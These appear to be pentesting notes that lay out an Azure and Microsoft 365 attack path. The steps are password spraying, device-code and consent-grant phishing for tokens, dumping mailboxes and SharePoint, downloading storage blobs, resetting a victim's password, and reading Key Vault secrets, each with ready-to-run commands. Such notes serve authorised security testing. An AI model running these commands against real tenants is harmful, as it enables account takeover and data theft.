Azure

Getting Access

The first part of Azure pentesting is trying to get access.

This can be done via various methods

1. Brute forcing accounts

2. Phishing for tokens

3. Connecting to public resources that may contain credentials

Brute Forcing

We can use MSOL-Spray to spray a password for different accounts

GitHub - dafthack/MSOLSpray: A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled.GitHub

Import-Module .\MSOLSpray-master\MSOLSpray.ps1


Invoke-MSOLSpray -UserList .\userlist.txt -Password Password123

[*] There are 5 total users to spray.
[*] Now spraying Microsoft Online.
[*] Current date and time: 04/18/2022 14:22:05

Phishing Links

There are two ways to phish for tokens

1. Token Tactics

2. Illicit Consent Attacks

Token Tactics

GitHub - rvrsh3ll/TokenTactics: Azure JWT Token Manipulation ToolsetGitHub

We can use Token Tactics to generate a phishing link to send to the user

Import-Module .\TokenTactics-main\TokenTactics.psd1

> Get-AzureToken -Client MSGraph

user_code : C4UJUN7B3
device_code : CAQABAAEAAAD--DLA3VO7Qr…
verification_url : https://microsoft.com/devicelogin
expires_in : 900
interval : 5
message : To sign in, use a web browser to open the page
https://microsoft.com/devicelogin and enter the code C4UJUN7B3 to
authenticate.
authorization_pending

Now we send the email to the target

When victim clicks and enters the code, we will get his access token

Illicit Consent Attacks

This method of attack assumes you have already breached the portal, and we can further elevate our privileges by creating an application with excessive RW permissions, and trick a user to consenting the application to access data on their behalf.

There are some pre-requisites to this

In the portal, it should say that users can register applications

In User Consent Settings for Enterprise Applications, it should be configured such that users can allow consent for apps

Now we can create an application, and grant it excessive delegated permissions such as reading all data, users and files.

We then need to configure 365-Stealer

GitHub - AlteredSecurity/365-Stealer: 365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack.GitHub

Enter the Application ID, Application Secret and Return URL

Now we run the server, and when the user clicks consent to the application, we can get their token with all the delegated permissions we obtained earlier

python .\365-Stealer.py --run-app

A note about tokens

I've written a short blog post here to describe the tokens and their related permissions

https://chmod744.super.site/azure-access-tokenschmod744.super.site

Enumeration using Tokens

Once we have access and we have the tokens of the users, we can start enumerating to see what other resources we can access

We can do this via accessing Emails or SharePoint resources

Email dumping

We use Token Tactics again to dump emails using the access token

Import-Module .\TokenTactics-main\TokenTactics-main\TokenTactics.psd1

Dump-OWAMailboxViaMSGraphApi -AccessToken $access_token -mailFolder AllItems

SharePoint dumping

Listing files in SharePoint

$Token =
'eyJ0eXAiOiJKV1QiLCJub25jZSI6InNkZENGd2gzbDlqampfeXhjU0VtLTI1VUlRN0gzc29Ka
2tiZnVMR3BrT1kiLCJhbGciOiJSUzI1NiIsIn[...]RGpfNTJ2YndHTmd2UU8yVnpNYyIsImtp
ZCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNYyJ9.eyJhdWQiOiJod'

$URI = 'https://graph.microsoft.com/v1.0/me/drive/root/children'

$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{ 'Authorization' = "Bearer $Token" } }

(Invoke-RestMethod @RequestParams).value

If we see a resource with download links at @microsoft.graph.downloadUrl, we can visit the URL to download the file

Enumeration using Credentials

If we have user credentials obtained from Brute Forcing, Dumping emails and SharePoint enumeration, we can do deeper enumeration of the Azure Environment

We can either use Azure CLI, or Azure PowerShell cmdlets

The functionalities between these two approaches are similar, with each tool having slightly unique capabilites

Logging In

Logging in with normal user credentials

az login -u "user@domain.com" -p "password"
--allow-no-subscriptions

$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('user@domain.com', $password)

Connect-AzAccount -Credential $creds

Logging in with SPN accounts

In order to authenticate with SPN, we need the following:

1. Client ID

2. Client Secret

3. Tenant ID

Client ID and Secret should be obtained via other forms of resource enumeration.

We can get Tenant ID by visiting https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration

For example

https://login.microsoftonline.com/dummy.onmicrosoft.com/.well-known/openid-configuration

Now we can login

az login --service-principal -u <client ID> -p <client Secret> --tenant <Tenant ID>

$password = ConvertTo-SecureString <client secret> -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential(<client ID>, $password)

Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant <tenant ID>

Enumerating Resources

az resource list

Get-AzResource

In the event where you see a container, but the resources are not being shown due to permission issues, we can download them to our local machine instead

# 1. to get the name of the storage
az storage account list 

# 2. get the keys for the storage
 az storage account keys list --account-name "storagename"

# 3. get the container name
az storage container list --account-name "storagename" --account-key <key_value>  

# 4. download all files in the container
az storage blob download-batch -d . -s mycontainer --account-name "storagename" --account-key <key value> 

Or, we can use Storage Explorer.exe to connect to subscriptions or publicly accessible storage containers

Azure Storage Explorer – cloud storage management | Microsoft Azureazure.microsoft.com

Listing Roles

We need to look out for custom roles, which are user created non-standard roles which contain special privileges

az role assignment list --all
az role definition list --custom-role-only

Get-AzRoleAssignment

Listing Users

Listing all users in the Azure AD

az ad user list

Get-AzADuser

Listing Groups

Getting groups on the AD, as well as group memberships

az ad group list

az ad group member list --group 01086658-6706-44e8-a373-96ab550c72f7

Get-AzADGroup

Get-AzADGroupMember -ObjectId 01086658-6706-44e8-a373-96ab550c72f7

Listing Roles in Azure AD

For this, we need to run Connect-AzureAD with the credentials

$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('user@domain.com', $password)

Connect-AzureAD -Credential $creds

Then we list available roles

Get-AzureADDirectoryRole

And list members who have the role

Get-AzureADDirectoryRole -ObjectId b5da7126-cb27-48e6-a316-e319ba453b65 | Get-AzureADDirectoryRoleMember

If we have a role that can reset passwords, we can do so with these commands

$password = "newpassword" | ConvertTo-SecureString -AsPlainText -Force

(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@domain.com"}).ObjectId | Set-AzureADUserPassword -Password $Password -Verbose

Access Password Vaults

After listing resources, if we see password vaults, we can access the plain text passwords stored in them.

Vaults require special types of tokens to access. These tokens can be obtained with Azure CLI

az account get-access-token --resource https://vault.azure.net

Once we have the token, we use Azure PowerShell cmdlet to access the data

Connect-AzAccount -AccessToken $AccessToken -KeyVaultAccessToken $KeyVault -AccountId e763211c-0447-4a4f-9e9c-da98c94a5f40

Get-AzKeyVaultSecret -VaultName Secret-Vault

Get-AzKeyVaultSecret -VaultName Secret-Vault -Name passwords -AsPlainText

Requesting for Tokens

After we have authenticated as a user on Azure CLI, we can request for more token to access other services such as GraphAPI or Azure Password vaults

az account get-access-token --resource https://management.azure.com
az account get-access-token --resource https://vault.azure.net
az account get-access-token --resource https://graph.windows.net